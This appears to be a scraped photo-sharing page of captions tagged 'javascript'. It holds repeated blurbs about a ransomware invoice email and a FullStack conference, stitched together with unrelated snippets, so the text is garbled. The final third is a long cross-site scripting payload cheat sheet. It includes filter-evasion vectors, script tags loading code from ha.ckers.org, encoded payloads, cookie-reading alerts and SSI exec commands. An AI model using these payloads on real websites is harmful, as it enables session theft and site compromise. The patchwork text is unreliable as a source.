View allAll Photos Tagged javascript

Part of the JavaScript code that was attached to an e-mail as a fake invoice in a zip file.

 

Once the user opens the malicious zip file the JavaScript code is executed and the ransomware software is downloaded from an infected website.

 

When the ransomware software is running it will encrypt all files that match particular extensions.

 

After encryption, a message (displayed on the user's desktop) instructs them to download the Tor browser and visit a specific criminal-operated Web site for further information.

 

Read more: en.wikipedia.org/wiki/Ransomware

Part of the JavaScript code that was attached to an e-mail as a fake invoice in a zip file.

 

Once the user opens the malicious zip file the JavaScript code is executed and the ransomware software is downloaded from an infected website.

 

When the ransomware software is running it will encrypt all files that match particular extensions.

 

After encryption, a message (displayed on the user's desktop) instructs them to download the Tor browser and visit a specific criminal-operated Web site for further information.

 

Read more: en.wikipedia.org/wiki/Ransomware

Part of the JavaScript code that was attached to an e-mail as a fake invoice in a zip file.

 

Once the user opens the malicious zip file the JavaScript code is executed and the ransomware software is downloaded from an infected website.

 

When the ransomware software is running it will encrypt all files that match particular extensions.

 

After encryption, a message (displayed on the user's desktop) instructs them to download the Tor browser and visit a specific criminal-operated Web site for further information.

 

Read more: en.wikipedia.org/wiki/Ransomware

Part of the JavaScript code that was attached to an e-mail as a fake invoice in a zip file.

 

Once the user opens the malicious zip file the JavaScript code is executed and the ransomware software is downloaded from an infected website.

 

When the ransomware software is running it will encrypt all files that match particular extensions.

 

After encryption, a message (displayed on the user's desktop) instructs them to download the Tor browser and visit a specific criminal-operated Web site for further information.

 

Read more: en.wikipedia.org/wiki/Ransomware

Part of the JavaScript code that was attached to an e-mail as a fake invoice in a zip file.

 

Once the user opens the malicious zip file the JavaScript code is executed and the ransomware software is downloaded from an infected website.

 

When the ransomware software is running it will encrypt all files that match particular extensions.

 

After encryption, a message (displayed on the user's desktop) instructs them to download the Tor browser and visit a specific criminal-operated Web site for further information.

 

Read more: en.wikipedia.org/wiki/Ransomware

Part of the JavaScript code that was attached to an e-mail as a fake invoice in a zip file.

 

Once the user opens the malicious zip file the JavaScript code is executed and the ransomware software is downloaded from an infected website.

 

When the ransomware software is running it will encrypt all files that match particular extensions.

 

After encryption, a message (displayed on the user's desktop) instructs them to download the Tor browser and visit a specific criminal-operated Web site for further information.

 

Read more: en.wikipedia.org/wiki/Ransomware

Impressions from Skills Matter's FullStack Conference 2014.

 

MISSED THE CONFERENCE?

 

All talks have been recorded as SkillsCasts (film/code/slides) and are available to watch by Skills Matter's Community here: skillsmatter.com/conferences/6361-fullstack-node-and-java...

 

Joining the Skills Matter community is free, and it only takes a few minutes to sign up.

 

FULLSTACK 2015 - LONDON, JUNE 25-26TH

We are proud to announce FullStack 2015 – the conference on Node, JavaScript and hackable electronics. This year, we will bring the world's top innovators, hackers and experts together with our amazing developer community in London to learn and share skills, gain insights and drive innovation. Join to experience three days jam-packed with talks, demos, and coding.

 

Join us at FullStack 2015 in London on June 25-26th!

The FullStack 2015 will kick off with two days of talks and discussions over 4 tracks each day covering JavaScript, Node, hackable electronics and other topics you may tell us you wish to see.

 

Each track will feature talks by some of the world's top hackers and makers who are helping evolve technologies and practices in the exciting world of web, mobile, servers, drones and robots. In addition, each track will feature a Park Bench Panel discussion and 5 lightning talks by some of the great engineering teams in our community who use FullStack technologies and practices daily and will demo their projects.

 

Following two days of talks, we'll continue with a Saturday featuring hands-on Tutorials, so that you can gain some hands-on experience and practical skills to implement new ideas from the talks you attended and the people you met during the first 2 days!

 

Like the sound of that? Find out more here: skillsmatter.com/conferences/6612-fullstack-the-conferenc...

 

CALL FOR THOUGHTS NOW OPEN - SHARE YOUR IDEAS!

Skills Matter's community conferences are made possible thanks to our passionate community - who constantly feed us with their ideas. Who are the experts you would like to learn and share skills with next year? What topics would you like to see covered? How can we improve on 2014's conference? Help us create a great 3 days by submitting your thoughts, ideas, dreams and requirements through our Call For Thoughts Program (www.surveymonkey.com/s/VFGCDQ9) - and we'll start working on these straight away!

Impressions from Skills Matter's FullStack Conference 2014.

 

MISSED THE CONFERENCE?

 

All talks have been recorded as SkillsCasts (film/code/slides) and are available to watch by Skills Matter's Community here: skillsmatter.com/conferences/6361-fullstack-node-and-java...

 

Joining the Skills Matter community is free, and it only takes a few minutes to sign up.

 

FULLSTACK 2015 - LONDON, JUNE 25-26TH

We are proud to announce FullStack 2015 – the conference on Node, JavaScript and hackable electronics. This year, we will bring the world's top innovators, hackers and experts together with our amazing developer community in London to learn and share skills, gain insights and drive innovation. Join to experience three days jam-packed with talks, demos, and coding.

 

Join us at FullStack 2015 in London on June 25-26th!

The FullStack 2015 will kick off with two days of talks and discussions over 4 tracks each day covering JavaScript, Node, hackable electronics and other topics you may tell us you wish to see.

 

Each track will feature talks by some of the world's top hackers and makers who are helping evolve technologies and practices in the exciting world of web, mobile, servers, drones and robots. In addition, each track will feature a Park Bench Panel discussion and 5 lightning talks by some of the great engineering teams in our community who use FullStack technologies and practices daily and will demo their projects.

 

Following two days of talks, we'll continue with a Saturday featuring hands-on Tutorials, so that you can gain some hands-on experience and practical skills to implement new ideas from the talks you attended and the people you met during the first 2 days!

 

Like the sound of that? Find out more here: skillsmatter.com/conferences/6612-fullstack-the-conferenc...

 

CALL FOR THOUGHTS NOW OPEN - SHARE YOUR IDEAS!

Skills Matter's community conferences are made possible thanks to our passionate community - who constantly feed us with their ideas. Who are the experts you would like to learn and share skills with next year? What topics would you like to see covered? How can we improve on 2014's conference? Help us create a great 3 days by submitting your thoughts, ideas, dreams and requirements through our Call For Thoughts Program (www.surveymonkey.com/s/VFGCDQ9) - and we'll start working on these straight away!

Part of the JavaScript code that was attached to an e-mail as a fake invoice in a zip file.

 

Once the user opens the malicious zip file the JavaScript code is executed and the ransomware software is downloaded from an infected website.

 

When the ransomware software is running it will encrypt all files that match particular extensions.

 

After encryption, a message (displayed on the user's desktop) instructs them to download the Tor browser and visit a specific criminal-operated Web site for further information.

 

Read more: en.wikipedia.org/wiki/Ransomware

Part of the JavaScript code that was attached to an e-mail as a fake invoice in a zip file.

 

Once the user opens the malicious zip file the JavaScript code is executed and the ransomware software is downloaded from an infected website.

 

When the ransomware software is running it will encrypt all files that match particular extensions.

 

After encryption, a message (displayed on the user's desktop) instructs them to download the Tor browser and visit a specific criminal-operated Web site for further information.

 

Read more: en.wikipedia.org/wiki/Ransomware

Impressions from Skills Matter's FullStack Conference 2014.

 

MISSED THE CONFERENCE?

 

All talks have been recorded as SkillsCasts (film/code/slides) and are available to watch by Skills Matter's Community here: skillsmatter.com/conferences/6361-fullstack-node-and-java...

 

Joining the Skills Matter community is free, and it only takes a few minutes to sign up.

 

FULLSTACK 2015 - LONDON, JUNE 25-26TH

We are proud to announce FullStack 2015 – the conference on Node, JavaScript and hackable electronics. This year, we will bring the world's top innovators, hackers and experts together with our amazing developer community in London to learn and share skills, gain insights and drive innovation. Join to experience three days jam-packed with talks, demos, and coding.

 

Join us at FullStack 2015 in London on June 25-26th!

The FullStack 2015 will kick off with two days of talks and discussions over 4 tracks each day covering JavaScript, Node, hackable electronics and other topics you may tell us you wish to see.

 

Each track will feature talks by some of the world's top hackers and makers who are helping evolve technologies and practices in the exciting world of web, mobile, servers, drones and robots. In addition, each track will feature a Park Bench Panel discussion and 5 lightning talks by some of the great engineering teams in our community who use FullStack technologies and practices daily and will demo their projects.

 

Following two days of talks, we'll continue with a Saturday featuring hands-on Tutorials, so that you can gain some hands-on experience and practical skills to implement new ideas from the talks you attended and the people you met during the first 2 days!

 

Like the sound of that? Find out more here: skillsmatter.com/conferences/6612-fullstack-the-conferenc...

 

CALL FOR THOUGHTS NOW OPEN - SHARE YOUR IDEAS!

Skills Matter's community conferences are made possible thanks to our passionate community - who constantly feed us with their ideas. Who are the experts you would like to learn and share skills with next year? What topics would you like to see covered? How can we improve on 2014's conference? Help us create a great 3 days by submitting your thoughts, ideas, dreams and requirements through our Call For Thoughts Program (www.surveymonkey.com/s/VFGCDQ9) - and we'll start working on these straight away!

Impressions from Skills Matter's FullStack Conference 2014.

 

MISSED THE CONFERENCE?

 

All talks have been recorded as SkillsCasts (film/code/slides) and are available to watch by Skills Matter's Community here: skillsmatter.com/conferences/6361-fullstack-node-and-java...

 

Joining the Skills Matter community is free, and it only takes a few minutes to sign up.

 

FULLSTACK 2015 - LONDON, JUNE 25-26TH

We are proud to announce FullStack 2015 – the conference on Node, JavaScript and hackable electronics. This year, we will bring the world's top innovators, hackers and experts together with our amazing developer community in London to learn and share skills, gain insights and drive innovation. Join to experience three days jam-packed with talks, demos, and coding.

 

Join us at FullStack 2015 in London on June 25-26th!

The FullStack 2015 will kick off with two days of talks and discussions over 4 tracks each day covering JavaScript, Node, hackable electronics and other topics you may tell us you wish to see.

 

Each track will feature talks by some of the world's top hackers and makers who are helping evolve technologies and practices in the exciting world of web, mobile, servers, drones and robots. In addition, each track will feature a Park Bench Panel discussion and 5 lightning talks by some of the great engineering teams in our community who use FullStack technologies and practices daily and will demo their projects.

 

Following two days of talks, we'll continue with a Saturday featuring hands-on Tutorials, so that you can gain some hands-on experience and practical skills to implement new ideas from the talks you attended and the people you met during the first 2 days!

 

Like the sound of that? Find out more here: skillsmatter.com/conferences/6612-fullstack-the-conferenc...

 

CALL FOR THOUGHTS NOW OPEN - SHARE YOUR IDEAS!

Skills Matter's community conferences are made possible thanks to our passionate community - who constantly feed us with their ideas. Who are the experts you would like to learn and share skills with next year? What topics would you like to see covered? How can we improve on 2014's conference? Help us create a great 3 days by submitting your thoughts, ideas, dreams and requirements through our Call For Thoughts Program (www.surveymonkey.com/s/VFGCDQ9) - and we'll start working on these straight away!

Impressions from Skills Matter's FullStack Conference 2014.

 

MISSED THE CONFERENCE?

 

All talks have been recorded as SkillsCasts (film/code/slides) and are available to watch by Skills Matter's Community here: skillsmatter.com/conferences/6361-fullstack-node-and-java...

 

Joining the Skills Matter community is free, and it only takes a few minutes to sign up.

 

FULLSTACK 2015 - LONDON, JUNE 25-26TH

We are proud to announce FullStack 2015 – the conference on Node, JavaScript and hackable electronics. This year, we will bring the world's top innovators, hackers and experts together with our amazing developer community in London to learn and share skills, gain insights and drive innovation. Join to experience three days jam-packed with talks, demos, and coding.

 

Join us at FullStack 2015 in London on June 25-26th!

The FullStack 2015 will kick off with two days of talks and discussions over 4 tracks each day covering JavaScript, Node, hackable electronics and other topics you may tell us you wish to see.

 

Each track will feature talks by some of the world's top hackers and makers who are helping evolve technologies and practices in the exciting world of web, mobile, servers, drones and robots. In addition, each track will feature a Park Bench Panel discussion and 5 lightning talks by some of the great engineering teams in our community who use FullStack technologies and practices daily and will demo their projects.

 

Following two days of talks, we'll continue with a Saturday featuring hands-on Tutorials, so that you can gain some hands-on experience and practical skills to implement new ideas from the talks you attended and the people you met during the first 2 days!

 

Like the sound of that? Find out more here: skillsmatter.com/conferences/6612-fullstack-the-conferenc...

 

CALL FOR THOUGHTS NOW OPEN - SHARE YOUR IDEAS!

Skills Matter's community conferences are made possible thanks to our passionate community - who constantly feed us with their ideas. Who are the experts you would like to learn and share skills with next year? What topics would you like to see covered? How can we improve on 2014's conference? Help us create a great 3 days by submitting your thoughts, ideas, dreams and requirements through our Call For Thoughts Program (www.surveymonkey.com/s/VFGCDQ9) - and we'll start working on these straight away!

삶이란 자신이 콘트롤하고 싶어도 한계가 있는것같다. 점점 web space에 내 career가 pigeon hole되어 가고있다.

 

좋은건지 모르겠지만 분명한건 한가지이다. 나쁘진 않다.

 

Commet server나 만들어 볼까?

 

The picture is of all the books that I read since working at NTEL-X.

  

Part of the JavaScript code that was attached to an e-mail as a fake invoice in a zip file.

 

Once the user opens the malicious zip file the JavaScript code is executed and the ransomware software is downloaded from an infected website.

 

When the ransomware software is running it will encrypt all files that match particular extensions.

 

After encryption, a message (displayed on the user's desktop) instructs them to download the Tor browser and visit a specific criminal-operated Web site for further information.

 

Read more: en.wikipedia.org/wiki/Ransomware

Taken at dotJS 2017 in Paris on December 1, 2017 by Nicolas Ravelli

Design created with my PixelFlow HTML5 / EaselJS example:

www.mikechambers.com/blog/2011/02/02/pixelflow-easeljs-ca...

Part of the JavaScript code that was attached to an e-mail as a fake invoice in a zip file.

 

Once the user opens the malicious zip file the JavaScript code is executed and the ransomware software is downloaded from an infected website.

 

When the ransomware software is running it will encrypt all files that match particular extensions.

 

After encryption, a message (displayed on the user's desktop) instructs them to download the Tor browser and visit a specific criminal-operated Web site for further information.

 

Read more: en.wikipedia.org/wiki/Ransomware

Taken at dotJS 2017 in Paris on December 1, 2017 by Nicolas Ravelli

Part of the JavaScript code that was attached to an e-mail as a fake invoice in a zip file.

 

Once the user opens the malicious zip file the JavaScript code is executed and the ransomware software is downloaded from an infected website.

 

When the ransomware software is running it will encrypt all files that match particular extensions.

 

After encryption, a message (displayed on the user's desktop) instructs them to download the Tor browser and visit a specific criminal-operated Web site for further information.

 

Read more: en.wikipedia.org/wiki/Ransomware

Part of the JavaScript code that was attached to an e-mail as a fake invoice in a zip file.

 

Once the user opens the malicious zip file the JavaScript code is executed and the ransomware software is downloaded from an infected website.

 

When the ransomware software is running it will encrypt all files that match particular extensions.

 

After encryption, a message (displayed on the user's desktop) instructs them to download the Tor browser and visit a specific criminal-operated Web site for further information.

 

Read more: en.wikipedia.org/wiki/Ransomware

A new era in Structure Synth (at least for me) - generating all the rules via javascript!!!!

I knew you could use javascript but I never went further than to use it for some animations - bad mistake!!

Turns out you can write complete rule sets using javascript and you have access to math functions and variables this way.

I have written a short tutorial over at DA which should be accessible by the public

Javascript Structure Synth tutorial

Funmin.com released yet another interesting online puzzle game. Just hook to your favorite game site to get relaxed. Get the points by just clicking the similar colored boxes that gets vanished. A simple puzzle game with no difficult instructions to read and follow. More points for more number of color boxes grouped together. Game ends at a default time limit to finish all the color boxes. Register your score in our database to bet your friends online. What more a free game can provide than an exciting time pass. Test your brain to get to top in scores.

A screenshot of code I'm writing for a huge update to my Azureus Dashboard Widget. You know you're writing good JavaScript when your IDE looks like a bowl of Froot Loops.

A snapshot of the JavaScript source for Armor Alley, printed on 48 pages of 8.5" x 11". I started hand-writing notes on the back of the last page, and worked my way in from there.

 

This is a rather lousy angle, but it's fun to have concepts like code printed on paper.

I think this is my first attempt at a Javascript widget. I'm a lame coder and it could be easier for people to grab and use, but it seems to work.

 

Details at my blog.

A graph I created to show the normal distribution of a random function.

alert(123);

alert("XSS");

alert(123)

alert("hellox worldss");

alert(“XSS”)

alert(“XSS”);

alert(‘XSS’)

“>alert(“XSS”)

alert(/XSS”)

alert(/XSS/)

alert(1)

‘; alert(1);

‘)alert(1);//

alert(1)

         

{font-family:''

 

<input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"

 

alert&lpar;1&rpar; {Opera}

 

<img/src=`%00` onerror=this.onerror=confirm(1)

 

<isindex formaction="javascript&colon;confirm(1)"

 

<img src=`%00`&NewLine; onerror=alert(1)&NewLine;

   

prompt(1)</ScRipT giveanswerhere=?

   

/*%00*/alert(1)/*%00*/</script /*%00*/

 

">%00

 

<iframe/src="data:text/html,">

   

</script

 

<script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}

    

X

     

X</a

 

http://www.googlealert(document.location)</script

 

XYZ</a

 

<img/src=@ onerror = prompt('1')

 

<style/onload=prompt('XSS')

 

alert(String.fromCharCode(49))</script ^__^

 

/**/alert(document.location)/**/</script :-(

 

   

/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/

   

X

 

alert(0%0)

   

SPAN

 

<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)

 

">{-o-link-source&colon;''

 

OnMouseOver {Firefox & Opera}

 

^__^

 

X {IE7}

 

<iframe/%00/ src=javaSCRIPT&colon;alert(1)

 

////

 

/*iframe/src*/<iframe/src="

 

//|\\ //|\\ </script //|\\

 

/{src:''/

 

 

<plaintext/onmouseover=prompt(1)

 

''alert(1) {Opera}

 

 

DIV

   

X

     

On Mouse Over

 

Click Here

   

<%

  

<iframe/src \/\/onload = prompt(1)

 

<iframe/onreadystatechange=alert(1)

 

<svg/onload=alert(1)

 

<input value=<iframe/src=javascript:confirm(1)

 

<input type="text" value=`` X

 

www.alert(1)</script .com

   

alert(1)

      

click

  

MsgBox+1

 

<a href="data:text/html;base64_,">X</a

   

~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+

 

</script a=\u0061 & /=%2F

</script

   

+-+-1-+-+alert(1)

   

/*<script* */alert(1)</script

 

<img src ?itworksonchrome?\/onerror = alert(1)

 

//&NewLine;confirm(1);</script

alert(1)

 

ClickMe

 

alert(1) </script 1=2

 

style="x:">

 

<--` --!>

  

x

 

">

 

CLICKME

 

click

     

Click Me

 

String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)

‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–>”>’>alert(String.fromCharCode(88,83,83))

alert(“XSS”)”>

   

<alert(“XSS”);//<

%253cscript%253ealert(1)%253c/script%253e

“>alert(document.cookie)

fooalert(1)

<script>alert(1)</script>

      

<IMG SRC=”javascript:alert(‘XSS’)”

<iframe src=http://ha.ckers.org/scriptlet.html <

javascript:alert("hellox worldss")

  

">'>alert(String.fromCharCode(88,83,83))

   

" SRC="http://ha.ckers.org/xss.js">

" '' SRC="http://ha.ckers.org/xss.js">

'" SRC="http://ha.ckers.org/xss.js">

'>" SRC="http://ha.ckers.org/xss.js">

document.write("<SCRI");PT SRC="http://ha.ckers.org/xss.js">

<alert("XSS");//<

">'>alert(String.fromCharCode(88,83,83))

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>alert(String.fromCharCode(88,83,83))&submit.x=27&submit.y=9&cmd=search

alert("hellox worldss")&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510

alert("XSS");&search=1

0&q=';alert(String.fromCharCode(88,83,83))//\';alert%2?8String.fromCharCode(88,83,83))//";alert(String.fromCharCode?(88,83,83))//\";alert(String.fromCharCode(88,83,83)%?29//-->">'>alert(String.fromCharCode(88,83%?2C83))&submit-frmGoogleWeb=Web+Search

hellox worldss

   

...

lol

  

<img src="

alert(1)">

alert(1)">

alert(1)">

alert(1)'>">

alert(1)">

alert(123)">

LOL

LOL*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}

({0:#0=alert/#0#/#0#(0)})

LOLalert(123)

<SCRIPT>alert(/XSS/.source)</SCRIPT>

\\";alert('XSS');//

</TITLE><SCRIPT>alert(\"XSS\");</SCRIPT>

<INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">

<BODY BACKGROUND=\"javascript:alert('XSS')\">

<BODY ONLOAD=alert('XSS')>

<IMG DYNSRC=\"javascript:alert('XSS')\">

<IMG LOWSRC=\"javascript:alert('XSS')\">

<BGSOUND SRC=\"javascript:alert('XSS');\">

<BR SIZE=\"&{alert('XSS')}">

<LAYER SRC=\"http://ha.ckers.org/scriptlet.html\"></LAYER>

<LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">

<LINK REL=\"stylesheet\" HREF=\"http://ha.ckers.org/xss.css\">

<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>

<META HTTP-EQUIV=\"Link\" Content=\"<http://ha.ckers.org/xss.css>; REL=stylesheet\">

<STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE>

<XSS STYLE=\"behavior: url(xss.htc);\">

<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS

<IMG SRC='vbscript:msgbox(\"XSS\")'>

<IMG SRC=\"mocha:[code]\">

<IMG SRC=\"livescript:[code]\">

žscriptualert(EXSSE)ž/scriptu

<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">

<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">

<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\"

<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>

<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>

<TABLE BACKGROUND=\"javascript:alert('XSS')\">

<TABLE><TD BACKGROUND=\"javascript:alert('XSS')\">

<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">

<DIV STYLE=\"background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029\">

<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">

<DIV STYLE=\"width: expression(alert('XSS'));\">

<STYLE>@im\port'\ja\vasc\ript:alert(\"XSS\")';</STYLE>

<IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">

<XSS STYLE=\"xss:expression(alert('XSS'))\">

exp/*<A STYLE='no\xss:noxss(\"*//*\");

xss:ex/*XSS*//*/*/pression(alert(\"XSS\"))'>

<STYLE TYPE=\"text/javascript\">alert('XSS');</STYLE>

<STYLE>.XSS{background-image:url(\"javascript:alert('XSS')\");}</STYLE><A CLASS=XSS></A>

<STYLE type=\"text/css\">BODY{background:url(\"javascript:alert('XSS')\")}</STYLE>

<!--[if gte IE 4]>

<SCRIPT>alert('XSS');</SCRIPT>

<![endif]-->

<BASE HREF=\"javascript:alert('XSS');//\">

<OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://ha.ckers.org/scriptlet.html\"></OBJECT>

<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>

<EMBED SRC=\"http://ha.ckers.org/xss.swf\" AllowScriptAccess=\"always\"></EMBED>

<EMBED SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"></EMBED>

a=\"get\";

b=\"URL(\\"\";

c=\"javascript:\";

d=\"alert('XSS');\\")\";

eval(a+b+c+d);

<HTML xmlns:xss><?import namespace=\"xss\" implementation=\"http://ha.ckers.org/xss.htc\"><xss:xss>XSS</xss:xss></HTML>

<XML ID=I><X><C><![CDATA[<IMG SRC=\"javas]]><![CDATA[cript:alert('XSS');\">]]>

</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<XML ID=\"xss\"><I><B><IMG SRC=\"javas<!-- -->cript:alert('XSS')\"></B></I></XML>

<SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"></SPAN>

<XML SRC=\"xsstest.xml\" ID=I></XML>

<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<HTML><BODY>

<?xml:namespace prefix=\"t\" ns=\"urn:schemas-microsoft-com:time\">

<?import namespace=\"t\" implementation=\"#default#time2\">

<t:set attributeName=\"innerHTML\" to=\"XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>\">

</BODY></HTML>

<SCRIPT SRC=\"http://ha.ckers.org/xss.jpg\"></SCRIPT>

<!--#exec cmd=\"/bin/echo '<SCR'\"--><!--#exec cmd=\"/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'\"-->

<? echo('<SCR)';

echo('IPT>alert(\"XSS\")</SCRIPT>'); ?>

<IMG SRC=\"http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\">

Redirect 302 /a.jpg victimsite.com/admin.asp&deleteuser

<META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=<SCRIPT>alert('XSS')</SCRIPT>\">

<HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-

<SCRIPT a=\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>

<SCRIPT =\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>

<SCRIPT a=\">\" '' SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>

<SCRIPT \"a='>'\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>

<SCRIPT a=`>` SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>

<SCRIPT a=\">'>\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>

<SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>

<A HREF=\"http://66.102.7.147/\">XSS</A>

<A HREF=\"http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\">XSS</A>

<A HREF=\"http://1113982867/\">XSS</A>

<A HREF=\"http://0x42.0x0000066.0x7.0x93/\">XSS</A>

<A HREF=\"http://0102.0146.0007.00000223/\">XSS</A>

<A HREF=\"htt p://6 6.000146.0x7.147/\">XSS</A>

<A HREF=\"//www.google.com/\">XSS</A>

<A HREF=\"//google\">XSS</A>

<A HREF=\"http://ha.ckers.org@google\">XSS</A>

<A HREF=\"http://google:ha.ckers.org\">XSS</A>

<A HREF=\"http://google.com/\">XSS</A>

<A HREF=\"http://www.google.com./\">XSS</A>

<A HREF=\"javascript:document.location='http://www.google.com/'\">XSS</A>

<A HREF=\"http://www.gohttp://www.google.com/ogle.com/\">XSS</A>

<

%3C

&lt

<

&LT

&LT;

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

<

\x3c

\x3C

\u003c

\u003C

<iframe src=http://ha.ckers.org/scriptlet.html>

<IMG SRC=\"javascript:alert('XSS')\"

<SCRIPT SRC=//ha.ckers.org/.js>

<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>

<<SCRIPT>alert(\"XSS\");//<</SCRIPT>

<SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(\"XSS\")>

<SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>

<IMG SRC=\" javascript:alert('XSS');\">

perl -e 'print \"<SCR\0IPT>alert(\\"XSS\\")</SCR\0IPT>\";' > out

perl -e 'print \"<IMG SRC=java\0script:alert(\\"XSS\\")>\";' > out

<IMG SRC=\"jav ascript:alert('XSS');\">

<IMG SRC=\"jav

ascript:alert('XSS');\">

<IMG SRC=\"jav ascript:alert('XSS');\">

<IMG SRC=javascript:alert('XSS')>

<IMG SRC=javascript:alert('XSS')>

<IMG SRC=javascript:alert('XSS')>

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

<IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">

<IMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`>

<IMG SRC=javascript:alert("XSS")>

<IMG SRC=JaVaScRiPt:alert('XSS')>

<IMG SRC=javascript:alert('XSS')>

<IMG SRC=\"javascript:alert('XSS');\">

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

'';!--\"<XSS>=&{()}

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>alert(String.fromCharCode(88,83,83))

'';!--"=&{()}

     

alert("XSS")">

   

<alert("XSS");//<

a=/XSS/alert(a.source)

\";alert('XSS');//

alert("XSS");

¼script¾alert(¢XSS¢)¼/script¾

        

@im\port'\ja\vasc\ript:alert("XSS")';

  

exp/*

 

a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('XSS');\")";eval(a+b+c+d+e);

  

document.write("<SCRI");PT SRC="http://ha.ckers.org/xss.js">

TESTHTML5FORMACTION

crosssitespt

  

<img src="

   

alert(1)">

alert(1)">

alert(1)">

({0:#0=alert/#0#/#0#(123)})

ReferenceError.prototype.__defineGetter__('name', function(){alert(123)}),x

Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()

{alert(1)};1

crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')

alert(1)

  

+ADw-script+AD4-alert(document.location)+ADw-/script+AD4-

%2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-

+ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-

%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-

%253cscript%253ealert(document.cookie)%253c/script%253e

“>alert(document.cookie)

